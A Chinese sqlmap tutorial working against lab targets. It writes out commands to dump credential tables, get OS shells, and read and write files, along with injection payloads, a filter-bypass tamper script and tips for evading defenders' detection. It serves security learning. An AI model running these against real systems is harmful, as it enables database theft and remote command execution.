注入工具SQLMAP教程：Tamper編寫;指紋修改;高權(quán)限操作;目錄架構(gòu)

#知識點：

1、SQLMAP-常規(guī)猜解&字典配置
2、SQLMAP-權(quán)限操作&文件命令
3、SQLMAP-Tamper&使用&開發(fā)
4、SQLMAP-調(diào)試指紋&風險等級

#參考文章：

https://www.cnblogs.com/bmjoker/p/9326258.html

#數(shù)據(jù)猜解-庫表列數(shù)據(jù)&字典

測試：http://vulnweb.com/
–current-db
–tables -D “”
–columns -T “” -D “”
–dump -C “” -C “” -T “”

1.IIS, ASP, Microsoft SQL Server（ACCESS數(shù)據(jù)庫）

• http://192.168.200.140:89/Pic.asp?classid=3

1.打開對應的UploadParsing網(wǎng)址，并使用其分配的IP進行訪問

2.源碼中，沒有進行sql語句的過濾，直接拼接，造成有注入風險

• http://192.168.200.140:89**/Pic.asp?classid=3**

  

3.使用sqlmap工具進行sql注入

• G:\develop\safety\ONE-FOX集成工具箱_V3.0魔改版_by狐貍\gui_scan\sqlmap

• **python sqlmap.py -u "" --tables** //獲取表名
  python sqlmap.py -u "" --cloumns -T admin //獲取admin表名下的列名
  **python sqlmap.py -u "" --dump -C "username,password" -T admin** //獲取表名下的列名數(shù)據(jù)

• python .\sqlmap.py -u "http://192.168.200.140:89/Pic.asp?classid=3" --tables

  • python .\\sqlmap.py: 啟動 SQLMap 工具，使用 Python 解釋器運行。

  • u "<http://192.168.200.140:89/Pic.asp?classid=3>": 指定目標 URL，即要測試的網(wǎng)站地址。在這個例子中，目標 URL 是 http://192.168.200.140:89/Pic.asp?classid=3。u 選項用于指定 URL。

  • -tables: 指定 SQLMap 工具執(zhí)行的任務，這里是獲取數(shù)據(jù)庫中的所有表。-tables 選項用于請求表的信息。

  • 提示有注入點

    

• 它詢問是否要使用常見的表存在性檢查方法

  • do you want to use common table existence check? [Y/n/q] y

  • 選擇要使用的常見表文件的提示。用戶可以選擇默認的常見表文件，也可以選擇自定義的常見表文件。

  • 詢問用戶要設置多少個線程進行測試

  • please enter number of threads? [Enter for 1 (current)] 輸入10

    

• python .\sqlmap.py -u "http://192.168.200.140:89/Pic.asp?classid=3" --columns -T admin

  • -columns: 這是 SQLMap 的一個選項，用于指示工具查找指定表的列。

  • T admin: 這是 SQLMap 的另一個選項，用于指定目標表的名稱。在這里，它是 “admin” 表。

    

    

• python .\sqlmap.py -u "http://192.168.200.140:89/Pic.asp?classid=3" --dump -C "username,password" -T admin

  • -dump: 這是 SQLMap 的選項，用于指示工具從數(shù)據(jù)庫中檢索數(shù)據(jù)。

  • C "username,password": 這是 SQLMap 的選項，用于指定要檢索的列的名稱。在這里，它是 “username” 和 “password” 列。

  • 得出如下的用戶名和密碼

    

• 如果修改數(shù)據(jù)庫的表名

• 將原本的數(shù)據(jù)庫中的Admin表表名修改為Adminxaiodi

• 將相關(guān)緩存輸出目錄刪除，繼續(xù)查詢

• 再次輸入**python .\sqlmap.py -u "http://192.168.200.140:89/Pic.asp?classid=3" --tables 查詢表名，發(fā)現(xiàn)無法測出Adminxiaodi表名**

• 原因是：使用猜測的字典中沒有相關(guān)Adminxiaodi表名，所以猜不出

• 方法：手動添加字典內(nèi)容

  • 字典位置：G:\develop\safety\ONE-FOX集成工具箱_V3.0魔改版_by狐貍\gui_scan\sqlmap\data\txt

  • 添加內(nèi)容：adminxiaodi

  • 重新運行，成功猜出

    

    

    

    

    

    

• 猜測完畢之后，sqlmap會自動將猜測出的東西，以提供的ip名或域名，以表格的形式存儲在本地，可以直接查看

  

  

2.Apache, PHP, MySQL（普通權(quán)限）

• http://testphp.vulnweb.com/artists.php**?artist=1（有注入漏洞）**

  

• python sqlmap.py -u “http://testphp.vulnweb.com/artists.php?artist=1” –is-dba是否是數(shù)據(jù)庫管理員）（會誤報）

• 輸出顯示 current user is DBA: False，這表示當前數(shù)據(jù)庫用戶不是數(shù)據(jù)庫管理員。

  分析這個結(jié)果的意義如下：

  • current user is DBA: False: 當前數(shù)據(jù)庫用戶并非數(shù)據(jù)庫管理員。數(shù)據(jù)庫管理員通常具有更高的權(quán)限，可以執(zhí)行更敏感的數(shù)據(jù)庫操作。

  這個信息是 SQLMap 在測試過程中根據(jù)數(shù)據(jù)庫的反饋來判斷的。在安全測試中，了解當前用戶是否是數(shù)據(jù)庫管理員對于評估系統(tǒng)的安全性和潛在的漏洞是重要的一部分。如果 --is-dba 結(jié)果為 True，則表明當前用戶是數(shù)據(jù)庫管理員，可能具有更大的潛在威脅。

  

• python sqlmap.py -u “http://testphp.vulnweb.com/artists.php?artist=1” –current-user==（獲取當前用戶名稱,推薦使用）==

1.python sqlmap.py -u “http://testphp.vulnweb.com/artists.php?artist=1” 使用 SQLMap 對提供的 URL 進行 SQL 注入測試。

• 這個命令的目的是使用 SQLMap 對提供的 URL 進行 SQL 注入測試。SQLMap 將自動嘗試檢測目標 URL 是否存在 SQL 注入漏洞
• **heuristic (basic) test shows that GET parameter 'artist' might be injectable (possible DBMS: 'MySQL')**這個分析結(jié)果是 SQLMap 對目標 URL 進行啟發(fā)式（基本）測試后得出的結(jié)論
  • GET parameter 'artist' might be injectable: SQLMap 發(fā)現(xiàn) GET 請求中的參數(shù) ‘a(chǎn)rtist’ 可能是可注入的。
  • Possible DBMS: ‘MySQL’: SQLMap 進一步猜測目標數(shù)據(jù)庫管理系統(tǒng)**（DBMS）可能是 MySQL。**

• GET parameter 'artist' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable

  • GET parameter ‘a(chǎn)rtist’ appears to be ‘MySQL >= 5.0.12 AND time-based blind (query SLEEP)’ injectable: ==SQLMap 發(fā)現(xiàn) ‘a(chǎn)rtist’ 參數(shù)可能受到 MySQL 版本大于等于 5.0.12 的時間盲注入漏洞的影響。==時間盲注入是一種 SQL 注入技巧，注入點插入類似 AND SLEEP(5) 的語句，來測試是否導致頁面在執(zhí)行時發(fā)生延遲。
  1. “Do you want to skip test payloads specific for other DBMSes? [Y/n]”: SQLMap 提供了一個選擇，詢問是否要跳過針對其他數(shù)據(jù)庫管理系統(tǒng)的特定測試負載。在這里，如果您確認目標系統(tǒng)是 MySQL，并且希望專注于 MySQL 測試，可==以選擇 “Y”（Yes），跳過其他 DBMS 的測試。==
  2. “For the remaining tests, do you want to include all tests for ‘MySQL’ extending provided level (1) and risk (1) values? [Y/n]”: SQLMap 進一步詢問是否在剩余的測試中包括所有針對 ‘MySQL’ 的測試，同時擴展提供的 level（級別）和 risk（風險）值。在這里，如果您希望執(zhí)行更全面的 MySQL 測試并擴展默認的測試級別和風險值，可以選擇 “Y”（Yes）。

  

• GET parameter ‘a(chǎn)rtist’ is vulnerable. Do you want to keep testing the others (if any)? [y/N]

  • GET parameter ‘a(chǎn)rtist’ is vulnerable: SQLMap 確認 ‘a(chǎn)rtist’ 參數(shù)存在漏洞，即可被注入。這可能是通過前面的測試（包括時間盲注入測試）得出的結(jié)論。

  • Do you want to keep testing the others (if any)? [y/N]: SQLMap 提供了一個選擇，詢問是否要繼續(xù)測試其他參數(shù)（如果有的話）。在這里，它詢問用戶是否想要繼續(xù)探測其他可能存在漏洞的參數(shù)。選擇 “y” 表示繼續(xù)測試其他參數(shù)，

  • 得到的結(jié)論：

    1. Injection Points:
       SQLMap已經(jīng)識別了一個注入點，即 GET 參數(shù) ‘a(chǎn)rtist’。它在測試中使用了不同類型的注入測試負載來驗證漏洞的存在。
    2. Boolean-based Blind Injection:
       • Type: 基于布爾的盲注（boolean-based blind）
       • Title: 使用 WHERE 或 HAVING 子句的布爾盲注
       • Payload: artist=1 AND 3483=3483
    3. Time-based Blind Injection:
       • Type: 基于時間的盲注（time-based blind）
       • Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
       • Payload: artist=1 AND (SELECT 5089 FROM (SELECT(SLEEP(5)))hRNW)
    4. UNION Query Injection:
       • Type: UNION 查詢注入
       • Title: 通用 UNION 查詢 (NULL) - 3 列
       • Payload: artist=-1425 UNION ALL SELECT CONCAT(0x717a706a71,0x4b4c4e714344494b55456f706c6c556f5968514e647a74536f72444975414d5a6c4a5a446756726c,0x7176787171),NULL,NULL-- -
    5. Back-end DBMS Information:
       • SQLMap 進一步確認后端數(shù)據(jù)庫管理系統(tǒng) (DBMS) 是 MySQL，且版本是大于等于 5.0.12。
    6. Web Server and Application Information:
       • Web 服務器操作系統(tǒng)：Linux Ubuntu
       • Web 應用程序技術(shù)：Nginx 1.19.0, PHP 5.6.40

    

2.由于MySQL數(shù)據(jù)庫，存在多種表，在檢測時候應先使用：ppython sqlmap.py -u “http://testphp.vulnweb.com/artists.php?artist=1” –current-db 表示要獲取當前數(shù)據(jù)庫的名稱。

• 如果直接使用python sqlmap.py -u “http://testphp.vulnweb.com/artists.php?artist=1” –tables 查詢所有數(shù)據(jù)庫名稱 顯示的會特別雜亂

  

• –current-db 表示要獲取當前數(shù)據(jù)庫的名稱。 會簡潔許多，定位在想要注入的數(shù)據(jù)庫中

3.python sqlmap.py -u “http://testphp.vulnweb.com/artists.php?artist=1” --tables -D “acuart” 并嘗試獲取指定數(shù)據(jù)庫（“acuart”）中的所有表的名稱。

4.python sqlmap.py -u “http://testphp.vulnweb.com/artists.php?artist=1” --columns -T “users” （對指定表（“users” ）進行測試，并嘗試獲取該表的所有列的名稱）

5.python sqlmap.py -u “http://testphp.vulnweb.com/artists.php?artist=1” --dump -C “name,pass” --columns -T “users”（從指定表 (“users”) 中的指定列 (“name” 和 “pass”) 中檢索數(shù)據(jù)，并將結(jié)果輸出。）

• 數(shù)據(jù)以表格形式保存在本地

#權(quán)限操作-文件&命令&交互式

測試：MYSQL高權(quán)限注入
引出權(quán)限：
–is-dba（誤報） --privileges（只能通過很多false或者true判斷，不明顯）

推薦使用–current-user

引出文件：
–file-read --file-write --file-dest
引出命令：
–os-cmd= --os-shell --sql-shell

1.判斷權(quán)限：python sqlmap.py -u “http://192.168.137.1:84/sqli/new.php?id=1” –is-dba（是否是數(shù)據(jù)庫管理員）（會誤報）或者==–current-user（獲取當前用戶名稱，推薦）==

• current user: 'root@localhost’,代表是最高權(quán)限Root權(quán)限

2.判斷是否可注入：python sqlmap.py -u "http://192.168.137.1:84/sqli/new.php?id=1"使用 SQLMap 對提供的 URL 進行 SQL 注入測試。

• 存在注入點
• 且為MySQL數(shù)據(jù)庫

3.引出命令：

–os-cmd=（在目標系統(tǒng)上執(zhí)行操作系統(tǒng)命令）
–os-shell (獲取一個操作系統(tǒng) shell（命令行）連接)
–sql-shell**（執(zhí)行SQL命令）**

• –sql-shell （執(zhí)行SQL命令）

  • select version(); （獲取數(shù)據(jù)庫版本信息）

    

  • select * from admin; （查詢表的信息）

    

  • 輸入exit退出

• –os-cmd= （在目標系統(tǒng)上執(zhí)行操作系統(tǒng)命令）

  • –os-cmd=calc （執(zhí)行計算器）

    • 詢問語言（直接回車默認即可）

      

    • 路徑自動查詢失敗，選則2（自定義路徑）

    • 并輸入對應文件名的相關(guān)目錄：（注意：直接輸入路徑即可，不用帶引號）G:\develop\safety\phpstudy_pro\WWW\dome01

      

    • do you want to retrieve the command standard output? [Y/n/a]在 SQLMap 執(zhí)行期間詢問是否要獲取命令的標準輸出（command standard output）（輸入a即可）

    

    

• –os-shell (獲取一個操作系統(tǒng) shell（命令行）連接)

  • 詢問語言（直接回車默認即可）

    

  • 路徑自動查詢失敗，選則2（自定義路徑）

  • 并輸入對應文件名的相關(guān)目錄：（注意：直接輸入路徑即可，不用帶引號）G:\develop\safety\phpstudy_pro\WWW\dome01

    

  • os-shell> ver （顯示當前操作系統(tǒng)的版本信息）并輸入y，得到回顯

    

  • os-shell> ipconfig （顯示ip地址）并輸入a或y

    

4.引出文件：

–file-read**（文件讀?。?*
–file-write --file-dest(寫入操作)

• **--file-read （文件讀取）**

  • **--file-read "f:\\1.txt”** 讀取F盤的文件1.txt

    • do you want confirmation that the remote file ‘f:/1.txt’ has been successfully downloaded from the back-end DBMS file system? [Y/n] y

    • SQLMap 在執(zhí)行時詢問是否要確認從后端數(shù)據(jù)庫管理系統(tǒng)（DBMS）文件系統(tǒng)成功下載了指定的遠程文件 ‘f:/1.txt’。以下是對選項的解釋：

      • Y (Yes): 表示你同意獲取確認，以驗證文件是否已成功從后端 DBMS 文件系統(tǒng)下載。如果選擇了這個選項，SQLMap 將嘗試驗證文件的下載。

      

  • 打開保存的文件，發(fā)現(xiàn)成功讀取

    

• --file-write 和 --file-dest 是 SQLMap 中用于執(zhí)行文件寫入操作的選項。

  • –file-write:此選項用于指定要寫入的文件的內(nèi)容。你需要提供一個文件的內(nèi)容或者文件路徑，SQLMap 將嘗試將該內(nèi)容寫入目標文件。

  • –file-dest:此選項用于指定要寫入內(nèi)容的目標文件路徑。你需要提供要寫入的文件的目標路徑，SQLMap 將嘗試將指定的內(nèi)容寫入該文件。

    python sqlmap.py -u "http://192.168.137.1:84/sqli/new.php?id=1" **--file-write="f:\\1.txt" --file-dest="c:\\123.txt"**
    
    

這個命令的目的是將指定的內(nèi)容（“f:\1.txt”）寫入 ‘c:\123.txt’ 文件。

#提交方法-POST&HEAD&JSON

測試：Post Cookie Json
–data “”
–cookie “”
-r 1.txt（推薦使用）

1.在處理POST請求的時候，應該首先在頁面測試

2.輸入用戶名和密碼進行登錄提交表單的測試

3.并進行抓包，查看對應==登錄文件中負載的表單數(shù)據(jù)格式==

4.普通的字符串格式：”uname=test&pass=test”

–data “”

• 該選項用于指定要發(fā)送的 POST 數(shù)據(jù)。在你的命令中，--data 的值被設置為空字符串，表示沒有提供具體的 POST 數(shù)據(jù)。通常，你需要在引號內(nèi)提供實際的 POST 數(shù)據(jù)，例如 **--data "**uname=test&pass=test**"**。

• 注意：指定URL需要指定，接受POST數(shù)據(jù)的URL，而不是登錄的URL

  • 是：http://testphp.vulnweb.com/userinfo.php（抓取到包中是有負載數(shù)據(jù)，才是目標URL）

  

• python sqlmap.py -u “http://testphp.vulnweb.com/userinfo.php” --data "uname=test&pass=test"
  • u "http://testphp.vulnweb.com/userinfo.php":
    • 指定目標 URL，這里是登錄頁面的 URL。
  • -data "uname=test&pass=test":
    • 指定 POST 請求的數(shù)據(jù)，這里是用戶名 uname 和密碼 pass，分別設置為 “test”。
• 成功實現(xiàn)POST數(shù)據(jù)注入：

–cookie “”（原理一樣，只做data的演示）

• 該選項用于指定要發(fā)送的 Cookie 信息。在你的命令中，--cookie 的值也被設置為空字符串，表示沒有提供具體的 Cookie 信息。通常，你需要在引號內(nèi)提供實際的 Cookie 信息，例如 --cookie "sessionID=123456"

推薦使用-r 1.txt

• 該選項用于從文件中讀取請求內(nèi)容。在你的命令中，-r 后面的值是文件路徑（1.txt），表示 SQLMap 將從該文件中讀取請求內(nèi)容，包括請求頭和請求體

1. 首先進行頁面測試，并進行抓包

2. 在抓包內(nèi)容下查看，攜帶POST請求數(shù)據(jù)的頁面：http://testphp.vulnweb.com**/userinfo.php**

3. 選中對應的頁面數(shù)據(jù)包，復制請求標頭

4. 復制請求數(shù)據(jù)包：uname=test&pass=test

5. 將復制的東西，創(chuàng)建一個head.txt文件，并存放在sqlmap的目錄下G:\develop\safety\ONE-FOX集成工具箱_V3.0魔改版_by狐貍\gui_scan\sqlmap

6. 將請求數(shù)據(jù)包中的數(shù)據(jù)，用*打上注入點，這樣方便快捷注入

   1. 如果沒有注入點，自動注入，無法確定在哪里注入，會浪費很多時間

7. 打開sqlmap，實行注入：python sqlmap.py-r .\head.txt

   1. 空格默認

      • QLMap 正在測試一個自定義的 POST 參數(shù) #1*，以確定它是否是動態(tài)生成的。

      • got a 302 redirect to 'http://testphp.vulnweb.com:80/login.php':

        • 在測試過程中，得到了一個 HTTP 302 重定向到 'http://testphp.vulnweb.com:80/login.php'。

      • Do you want to follow? [Y/n]:

        • SQLMap 詢問是否要跟隨這個重定向。即是否要按照新的 URL 繼續(xù)測試。

          

8. 成功注入

5.json格式：{“username”:“admin”,“password”:“123456”}

1. 抓包，指定URL：http://192.168.137.1:84/sqli/json_check.php

2. 選中對應的頁面數(shù)據(jù)包，復制請求標頭

3. 復制數(shù)據(jù)包：

   {
   “username”: “admin”,
   “password”: “123456”
   }

4. 將復制的東西，==創(chuàng)建一個json.txt==文件，并存放在sqlmap的目錄下G:\develop\safety\ONE-FOX集成工具箱_V3.0魔改版_by狐貍\gui_scan\sqlmap

5. 將請求數(shù)據(jù)包中的數(shù)據(jù)，用*打上注入點，這樣方便快捷注入

   1. 如果沒有注入點，自動注入，無法確定在哪里注入，會浪費很多時間

      {
      “username”: “admin*****”,
      “password”: “123456*****”
      }

6. 打開sqlmap，實行注入：python sqlmap.py-r .\json.txt

7. SQLMap 發(fā)現(xiàn)了多個注入點，并要求你選擇一個用于后續(xù)注入測試的注入點。以下是對該提示的解釋：默認選0即可

   • [0] place: (custom) POST, parameter: JSON #1*, type: Single quoted string (default):

     • 選項 0 表示注入點位于自定義 POST 請求的 JSON 參數(shù) #1*，類型是單引號字符串。這是默認選擇。

   • [1] place: (custom) POST, parameter: JSON #2*, type: Single quoted string:

     • 選項 1 表示注入點位于自定義 POST 請求的 JSON 參數(shù) #2*，類型是單引號字符串。

   • [q] Quit:

     • 選項 q 表示退出選擇，不選擇任何注入點。

       

6.無論哪種格式，為了保證數(shù)據(jù)包完整性都推薦使用-r 1.txt

• 該選項用于從文件中讀取請求內(nèi)容。在你的命令中，-r 后面的值是文件路徑（1.txt），表示 SQLMap 將從該文件中讀取請求內(nèi)容，包括請求頭和請求體

• 如果是json格式的POST數(shù)據(jù)包，使用–data去注入存在以下問題

  • 抓包，指定URL：http://192.168.137.1:84/sqli/json_check.php

  • 復制數(shù)據(jù)包：{“username”:“admin”,“password”:“123456”}

  • 打開sqlmap，實行注入：python sqlmap.py -u "http://192.168.137.1:84/sqli/json_check.php" --data "{"username":"admin","password":"123456"}"

    

  • **報錯all tested parameters do not appear to be injectable??*所有測試過的參數(shù)似乎都不可注入。

    

  • 原因：由于引號的影響，無法正確的讀取參數(shù)，插入注入點，所以報錯無法注入或沒有注入點

    

  • 即使加入*，標明注入點，依舊無法正常注入

  

  

#繞過模塊-Tamper腳本-使用&開發(fā)

測試：base64注入 有過濾的注入
–tamper=base64encode.py
–tamper=test.py

Tamper腳本使用

1.測試GET頁面，抓包，選中帶有負載數(shù)據(jù)的頁面http://192.168.137.1:84/sqli/base64.php?id=MQ==

2.由于注入頁面中有id=MQ==，判定是base64加密后的數(shù)據(jù)

3.實行sqlmap執(zhí)行查看注入點：python sqlmap.py -u "http://192.168.137.1:84/sqli/base64.php?id=MQ=="

4.報錯無注入點：原因base64編碼，導致注入語句怎樣拼接都無法成功解碼注入

5.采用sqlmap中自帶的Tamper腳本，解決base64編碼解碼問題

6.引入Tamper腳本base64encode.py，再次實行注入：python sqlmap.py -u “http://192.168.137.1:84/sqli/base64.php?id=MQ==” –tamper=base64encode.py成功注入

Tamper腳本開發(fā)思路：

（1）前期分析檢測判斷過濾條件，
（2）分析過濾條件實行轉(zhuǎn)換為對應的python代碼，
（3）將代碼放入sqlmap實驗是否可以繞過過濾

1.在代碼中，開啟對于一些注入語句的關(guān)鍵詞，進行過濾

2.抓包，指定url，使用sqlmap，查看注入點：python sqlmap.py -u "http://192.168.137.1:84/sqli/new.php?id=1" 報錯，由于網(wǎng)址開啟了過濾條件，無法正常注入

3.隨便在Tamper腳本中，復制一個模板，修改模板編寫自己想要過濾的條件代碼

# 導入 SQLMap 中定義的優(yōu)先級枚舉
from lib.core.enums import PRIORITY

# 設置 tamper 腳本的優(yōu)先級為低（LOW）
**priority** = PRIORITY.LOW

# 定義一個空的函數(shù) dependencies，用于聲明腳本的依賴關(guān)系，這里沒有具體的實現(xiàn)。
def dependencies():
    pass

# 定義 tamper 函數(shù)，它接受一個 payload 參數(shù)和其他關(guān)鍵字參數(shù)。
def tamper(payload, **kwargs):
    # 如果存在有效的 payload
    if payload:
        **# 替換 payload 中的一些 SQL 注入關(guān)鍵字，試圖繞過過濾機制
        payload = payload.replace('SELECT', 'sElEct')
        payload = payload.replace('OR', 'Or')
        payload = payload.replace('AND', 'And')
        payload = payload.replace('SLEEP', 'SleeP')
        payload = payload.replace('ELT', 'Elt')**
    # 返回處理后的 payload
    return payload

4.將編寫好的Tamper腳本，放置在sqlmap中的tamper目錄下G:\develop\safety\ONE-FOX集成工具箱_V3.0魔改版_by狐貍\gui_scan\sqlmap\tamper 并開啟sqlmap進行注入：**python sqlmap.py -u “http://192.168.137.1:84/sqli/new.php?id=1” –tamper=test 成功注入

#分析拓展-代理&調(diào)試&指紋&風險&等級）

1、后期分析調(diào)試：

v #詳細的等級(0-6)
0：只顯示Python的回溯，錯誤和關(guān)鍵消息。
1：顯示信息和警告消息。
2：顯示調(diào)試消息。
3：有效載荷注入。
4：顯示HTTP請求。
5：顯示HTTP響應頭。
6：顯示HTTP響應頁面的內(nèi)容

-v (0-6) 查看創(chuàng)建的Tamper腳本是否生效

對比前后是否使用Tamper腳本，的注入符號

• 不使用Tamper腳本python sqlmap.py -u “http://192.168.137.1:84/sqli/new.php?id=1” -v 4

• 使用Tamper腳本python sqlmap.py -u “http://192.168.137.1:84/sqli/new.php?id=1” -tamper=test -v 4

• 發(fā)現(xiàn)使用腳本前后，注入符號由OR更改為Or，證明腳本執(zhí)行成功

2、–proxy “http://xx:xx” #代理注入

• python sqlmap.py -u “http://192.168.137.1:84/sqli/new.php?id=1” --level=3 --risk=2 –proxy “http://127.0.0.1:8080/”

1. 確認關(guān)閉代理后，打開burp，將對應的代理的URL，使用 –proxy語句跟在sqlmap執(zhí)行語句之后；

2. 發(fā)現(xiàn)burp中接受到注入的的數(shù)據(jù)包，便于后期分析注入原理。

   

3、打亂默認指紋：

–user-agent “” #自定義user-agent
–random-agent #隨機user-agent

• 面試問題：由于顯示的數(shù)據(jù)包user-agent會攜帶一些**固有流量特征**，會被藍隊進行防護和識別。

  • sqlmap的固有流量特征：數(shù)據(jù)包user-agent中會默認其版本號

  • User-agent: sqlmap/1.7.2.16#dev (https://sqlmap.org)

    

• 解決方式：通過自定義或者隨機ua頭，避免被過濾

  • 通過自定義user-agent：--user-agent ""

  • 隨機user-agent：python sqlmap.py -u “http://192.168.137.1:84/sqli/new.php?id=1” -v 4 –random-agent

    

    

• 面試問題：一個網(wǎng)址訪問過快，大量的請求，頻繁的掃描行為，可能引起網(wǎng)絡防御工具的注意。

• 解決方式：使用延遲響應語句python sqlmap.py -u “http://192.168.137.1:84/sqli/new.php?id=1” -v 4 --random-agent –time-sec=(2,5)

--time-sec=5#延遲響應，默認遲為5秒。

• -time-sec=5 是sqlmap的一個命令行選項，用于指定在檢測過程中用于基于時間的盲注攻擊的時間延遲范圍。設置了時間延遲的范圍，以使sqlmap能夠在進行基于時間的盲注攻擊時更靈活地進行操作。時間延遲是在進行盲注時，根據(jù)響應的延遲時間來判斷是否成功執(zhí)行了SQL語句。

  

4、風險等級：–level --risk等級限制

–level=(1-5) #要執(zhí)行的測試水平等級，默認為1
–risk=(0-3) #測試執(zhí)行的風險等級，默認為1

• 總結(jié)：在使用盲注掃描注入點的時候，可以將規(guī)則等級進行設置提示，可能會掃到其他的注入點。

1. 將源碼設置為兩個可注入點：分別為id和User-Agent

   

2. 當使用sqlmap進行掃描的時候，不使用自己創(chuàng)建的Tamper腳本，默認掃描注入點：

   1. 首先使用默認等級進行掃描：

      1. python sqlmap.py -u “http://192.168.137.1:84/sqli/new.php?id=1”

      2. 發(fā)現(xiàn)有過濾，無法尋找到注入點

         

      

   2. 在執(zhí)行代碼后==規(guī)定等級：==**--level=3（測試水平等級）** --risk=2（執(zhí)行的風險等級） python sqlmap.py -u “http://192.168.137.1:84/sqli/new.php?id=1” --level=3 --risk=2

      1. 發(fā)現(xiàn)找到注入點：但是不是先前判斷的id注入點，而是不知曉的User-Agent
      2. 原因：使用高等級的規(guī)則進行查詢掃描注入點的時候，又可能會掃描到其他注入點

      

      

文章來源地址http://www.zghlxwxcb.cn/news/detail-835477.html

到了這里，關(guān)于注入工具SQLMAP教程：Tamper編寫；指紋修改；高權(quán)限操作；目錄架構(gòu)等的文章就介紹完了。如果您還想了解更多內(nèi)容，請在右上角搜索TOY模板網(wǎng)以前的文章或繼續(xù)瀏覽下面的相關(guān)文章，希望大家以后多多支持TOY模板網(wǎng)！